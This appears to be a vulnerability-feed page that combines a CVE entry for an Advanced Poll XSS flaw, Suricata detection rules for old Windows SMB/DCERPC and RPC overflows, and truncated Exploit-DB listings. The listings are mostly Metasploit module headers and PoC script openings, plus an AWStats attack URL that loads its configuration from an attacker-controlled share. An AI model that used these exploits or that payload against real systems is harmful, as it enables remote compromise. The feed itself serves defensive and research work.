CVE-2010-2003
Published: 2010-05-20
Priority: P4 · Severity: medium · CVSS 2.0 base score: 4.3 (vector AV:N/AC:M/Au:N/C:N/I:P/A:N)
EPSS: 2.00% (78.3rd percentile)
Cross-site scripting (XSS) vulnerability in misc/get_admin.php in Advanced Poll 2.08 allows remote attackers to inject arbitrary web script or HTML via the mysql_host parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| proxy2 | advanced_poll | — | — |
Suricata · 2010-09-23 · CVE-2003-0042 · GPL WEB_SERVER Tomcat null byte directory listing attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL WEB_SERVER Tomcat null byte directory listing attempt"; flow:established,to_server; http.uri; content:"|00|.jsp"; reference:bugtraq,2518; reference:bugtraq,6721; reference:cve,2003-0042; classtype:web-application-attack; sid:2102061; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0042, signature_severity Unknown, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0995 · GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103159; rev:4; metadata:created_at 2010_09_23, cve CVE_2003_0995, confidence Medium, signature_severity Informational, updated_at 2019_07_26;)
Suricata · 2010-09-23 · CVE-2003-0995 · GPL NETBIOS DCERPC msqueue little endian bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC msqueue little endian bind attempt"; flow:established,to_server; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103157; rev:6; metadata:created_at 2010_09_23, cve CVE_2003_0995, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, upda
Suricata · 2010-09-23 · CVE-2000-0133 · GPL FTP APPE overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP APPE overflow attempt"; flow:established,to_server; content:"APPE"; nocase; isdataat:100,relative; pcre:"/^APPE\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:bugtraq,8542; reference:cve,2000-0133; reference:cve,2003-0466; classtype:attempted-admin; sid:2102391; rev:12; metadata:created_at 2010_09_23, cve CVE_2000_0133, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0533 · GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102526; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata · 2010-09-23 · CVE-2003-0252 · GPL RPC mountd UDP mount path overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC mountd UDP mount path overflow attempt"; content:"|00 01 86 A5 00|"; depth:5; offset:12; content:"|00 00 00 01|"; within:4; distance:3; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1023,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,8179; reference:cve,2003-0252; reference:nessus,11800; classtype:misc-attack; sid:2102185; rev:8; metadata:created_at 2010_09_23, cve CVE_2003_0252, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata · 2010-09-23 · CVE-2003-0812 · GPL NETBIOS DCERPC Workstation Service direct service bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"GPL NETBIOS DCERPC Workstation Service direct service bind attempt"; flow:established,to_server; content:"|05 00 0B|"; depth:3; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102315; rev:8; metadata:created_at 2010_09_23, cve CVE_2003_0812, signature_severity Informational, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0818 · GPL EXPLOIT NTLM ASN.1 vulnerability scan attempt
Rule: alert http1 $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"GPL EXPLOIT NTLM ASN.1 vulnerability scan attempt"; flow:established,to_server; http.header; content:"Authorization|3A| Negotiate YIQAAABiBoMAAAYrBgEFBQKgggBTMIFQoA4wDAYKKwYBBAGCNwICCqM"; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12055; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:attempted-dos; sid:2102386; rev:14; metadata:created_at 2010_09_23, cve CVE_2003_0818, signature_severity Major, updated_at 2024_04_03;)
Suricata · 2010-09-23 · CVE-2003-0818 · GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt"; flow:established,to_server; content:"|FF|SMBs"; depth:5; offset:4; nocase; content:"`"; depth:1; offset:63; content:"|00 00 00|b|06 83 00 00 06|+|06 01 05 05 02|"; within:15; distance:1; content:"|06 0A|+|06 01 04 01 82|7|02 02 0A|"; distance:0; content:"|A3|>0<|A0|0"; distance:0; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12054; reference:nessus,12065; classtype:attempted-dos; sid:2102385; rev:13; metadata:created_at 2010_09_23, cve CVE_2003_0818, confidence Medium, signature_severity Informational, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0028 · GPL RPC portmap proxy integer overflow attempt TCP
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 111 (msg:"GPL RPC portmap proxy integer overflow attempt TCP"; flow:established,to_server; content:"|00 01 86 A0 00|"; depth:5; offset:16; content:"|00 00 00 05|"; within:4; distance:3; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,2048,12,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,7123; reference:cve,2003-0028; classtype:rpc-portmap-decode; sid:2102093; rev:7; metadata:created_at 2010_09_23, cve CVE_2003_0028, confidence Medium, signature_severity Informational, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0818 · GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2102383; rev:21; metadata:created_at 2010_09_23, cve CVE_2003_0818, confidence Medi
Suricata · 2010-09-23 · CVE-2003-0528 · GPL NETBIOS DCERPC Remote Activation bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Remote Activation bind attempt"; flow:established,to_server; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102251; rev:17; metadata:created_at 2010_09_23, cve CVE_2003_0528, signature_severity Informational, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0533 · GPL NETBIOS DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102524; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata · 2010-09-23 · CVE-2003-0812 · GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102310; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0812, confidence Medium, signature_severity Inf
Suricata · 2010-09-23 · CVE-2003-0812 · GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102311; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0812, confidence Medium, signature_severity Informational, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0533 · GPL NETBIOS SMB DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102525; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14
Suricata · 2010-09-23 · CVE-2003-0201 · GPL NETBIOS SMB trans2open buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB trans2open buffer overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|00 14|"; depth:2; offset:60; byte_test:2,>,256,0,relative,little; reference:bugtraq,7294; reference:cve,2003-0201; reference:url,www.digitaldefense.net/labs/advisories/DDI-1013.txt; classtype:attempted-admin; sid:2102103; rev:11; metadata:created_at 2010_09_23, cve CVE_2003_0201, confidence High, signature_severity Major, updated_at 2024_03_08;)
Suricata · 2010-09-23 · CVE-2003-0717 · GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt"; flow:established,to_server; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|04 00|"; within:2; byte_test:1,>,15,2,relative; byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; reference:nessus,11888; reference:nessus,11890; reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx; classtype:attempted-admin; sid:2102258; rev:11; metadata:created_at 2010
Exploit-DB · 2015-08-21 · CVE-2015-2467 · Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=414&can=1
The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In was disabled and Application Verifier was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86.
The attached minimized PoC produces the crash with 2 bit changes from the original file at offsets 0x11E60 and 0x1515F. Standard office document parsers did not reveal any significance about this location.
Attached files:
Fuzzed minimized PoC: 1567070353_min.doc
Fuzzed non-minimized PoC: 1567070353_crash.doc
Original non-fuzzed file: 1567070353_orig.doc
DLL Versi
Exploit-DB · 2010-11-30 · CVE-2010-4367 · AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution
---
source: https://www.securityfocus.com/bid/45123/info
Awstats is prone to an arbitrary command-execution vulnerability. This issue occurs when Awstats is used along with Apache Tomcat in Microsoft Windows.
An attacker can exploit this vulnerability to execute arbitrary shell commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible.
AWStats 6.95 and prior versions are vulnerable.
Attacking Windows XP Apache Tomcat AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav
Attacking Windows 2003 or Windows XP AWStats Server:
http://www.example.com/cgi-b
Exploit-DB · 2010-11-11 · CVE-2003-0714 · Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)
---
##
# $Id: ms03_046_exchange2000_xexch50.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',
'Description' => %q{
This is an exploit for the Exchange 2000 heap overflow. Due
to the nature of the vulnerability, this exploit is not very
reliable. This module has been tested against Exchange 2000
SP0 and SP3 running a Windows 2000 system patched to SP4. It
normally takes between one
Exploit-DB · 2010-10-05 · CVE-2003-0727 · Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
'Description' => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
c
Exploit-DB · 2010-10-01 · CVE-2010-1899 · Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)
---
Affected Vendors
Microsoft
Affected Products
Only Microsoft IIS 6.0 was tested successfully
On a Windows Server 2003 SP2 System
The System was NOT updated to the latest patches during testing.
Since tests “in the wild” have shown the attack to be real this advisory was released.
Vulnerability Details
The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator.
It is required that Active Server Pages are hosted by IIS and that an ASP script reads out a POST form value. When the following ASP script is hosted by IIS the attacker can run the attack:
This small script reads out a POST re
Exploit-DB · 2010-09-20 · CVE-2005-4560 · Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
---
##
# $Id: ms06_001_wmf_setabortproc.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
'Description' => %q{
This module exploits a vulnerability in the GDI library included with
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
to execute arbitrary code through the SetAbortProc procedure. This module
gener
Exploit-DB · 2010-09-20 · CVE-2003-0727 · Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Description' => %q{
This module exploits a stack buffer overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Black
Exploit-DB · 2010-09-12 · CVE-2010-3404 · eshtery CMS - SQL Injection
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub12-eshtery-cms-sql-injection-vulnerability/
'''
Abysssec Inc Public Advisory
Title : eshtery CMS Sql Injection Vulnerability
Affected Version : eshtery copyrights 2003-2004
Discovery : www.abysssec.com
Vendor : http://eshtery.she7ata.com/projects/eshtery/
Demo : http://eshtery.she7ata.com/projects/eshtery/
Download Links : http://sourceforge.net/projects/eshtery/
Description :
1) SQL Injection
For successful injection in this CMS you have to pass two steps.
Step 1:
Go to this path:
http://Example.com/catlgsearch.aspx
and enter this value
Exploit-DB · 2010-08-25 · CVE-2003-0344 · Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)
---
##
# $Id: ms03_020_ie_objecttype.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
:javascript => false,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
:prefix_html => "",
:postfix_html => "",
:rank => NormalRanking # reliable memory corruption
})
def initialize(info = {})
super(update_info(info,
'Name' => 'MS03-020 Internet Explorer Object Type',
'Description' => %q{
T
Exploit-DB · 2010-08-14 · CVSS 10.0 · CVE-2007-3336 [CRITICAL] · CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
---
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py "
print "Vulnerable Serv
Exploit-DB · 2010-07-25 · CVE-2003-0818 · Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)
---
##
# $Id: ms04_007_killbill.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft ASN.1 Library Bitstring Heap Overflow',
'Description' => %q{
This is an exploit for a previously undisclosed
vulnerability in the bit string decoding code in the
Microsoft ASN.1 library. This vulnerability is not related
to the bit string vulnerability described in eEye advisory
AD20040210-2. Both vulnerabilities were fixed in the
MS04
Exploit-DB · 2010-07-25 · CVE-2003-0349 · Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
---
##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
'Description' => %q{
This exploits a buffer overflow found in the nsiislog.dll
ISAPI filter that comes with Windows Media Server. This
module will also work against the 'patched' MS03-019
version. This vulnerability was addressed by MS03-022.
},
'Author' => [ 'hdm' ],
'License' => MSF_LI
Exploit-DB · 2010-07-03 · CVE-2003-0533 · Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
---
##
# $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the LSASS service; this vulnerability
was originally found by eEye. When re-exploiting a Windows XP system, you will
need to run this module twice. DCERPC request fragmentation can be performed by setting
Exploit-DB · 2010-07-03 · CVE-2006-3730 · Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)
---
##
# $Id: ms06_057_webview_setslice.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
'Description' => %q{
This module exploits a flaw in the WebViewFolderIcon ActiveX control
included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
during the Month of Browser Bugs project (MoBB #18).
},
'License' => MSF_LICENSE,
'Author' =>
[
Exploit-DB · 2010-07-03 · CVE-2003-0050 · QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
---
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
'Description' => %q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allowing arbitrary commands to be executed as root.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'OSVDB', '1056
Exploit-DB · 2010-07-02 · CVSS 10.0 · CVE-2010-1555 [CRITICAL] · HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution
---
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1555
# Code :
#!/usr/bin/python
import struct
import socket
import httplib
import urllib
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
exploitdb·2010-07-02·CVSS 10.0
CVE-2010-1553 [CRITICAL] HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
---
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1553
# Code :
#!/usr/bin/python
import struct
import socket
import httplib
import urllib
# calc.exe Windows Execute Command
Exploit-DB
Solaris Sadmind - Command Execution (Metasploit)
exploitdb·2010-06-22
CVE-2003-0722 Solaris Sadmind - Command Execution (Metasploit)
---
##
# $Id: sadmind_exec.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Solaris sadmind Command Execution',
'Description' => %q{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
Vulnerable systems include Solaris 2.7, 8, and 9.
},
'Author' => [ 'vlad902 ', 'hdm', 'cazz' ],
'License' => MSF_LICENSE,
'Version' =>
Exploit-DB
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-21
CVE-2003-0201 Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Mac OS X PPC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm', 'jduck' ],
'Version' => '$Revision: 9571 $',
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294'
Exploit-DB
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-21
CVE-2003-0201 Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Solaris SPARC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on Solaris SPARC systems that do not
have the noexec stack option set. Big thanks to MC and
valsmith for resolving a problem with the beta version of
this module.
},
'A
Exploit-DB
Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2003-0220 Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)
---
##
# $Id: kerio_auth.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
'Description' => %q{
